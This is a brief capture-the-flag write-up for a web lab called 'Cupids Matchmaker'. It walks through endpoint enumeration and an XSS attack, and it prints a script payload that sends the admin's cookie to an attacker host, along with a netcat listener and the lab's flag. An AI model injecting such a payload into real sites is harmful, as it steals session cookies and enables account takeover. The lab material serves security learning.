Task 1. Cupids Matchmaker
What is the flag?
THM{XSS_CuP1d_Str1k3s_Ag41n}
Initial Access
The lab already provides the target IP and port for the web service, so I went straight to the application in the browser to begin interacting with it.
Navigating the Application
Once the page loaded, I noticed a survey form as the main interaction point. This looked like the primary functionality of the application, so I proceeded by filling it out.
After submitting the survey, the application returned a response page.
Web Enumeration
To understand the attack surface better, I started enumerating available endpoints and directories.
During enumeration, I discovered an /admin page. Naturally, I accessed it to see if there was any direct entry point.
The page did not immediately reveal anything useful, and my initial attempts did not lead to progress. At this point, I reviewed my approach and identified that the application was likely vulnerable to client-side injection.
Exploiting XSS to Capture Admin Cookie
The application allowed input that was reflected back, which opened the possibility of exploiting a Cross Site Scripting vulnerability. I crafted a payload to capture the admin's session cookie.
<script>fetch('http://<ip>:8000/?c='+document.cookie)</script>
Before triggering the payload, I set up a listener to catch the incoming request:
nc -lnvp 8000
I then injected the payload through the application input.
After triggering it, I received a connection on my listener containing the admin cookie.
Decoding the Cookie
With the captured cookie, I proceeded to decode it to extract meaningful information.
Flag
THM{XSS_CuP1d_Str1k3s_Ag41n}
Thanks for reading.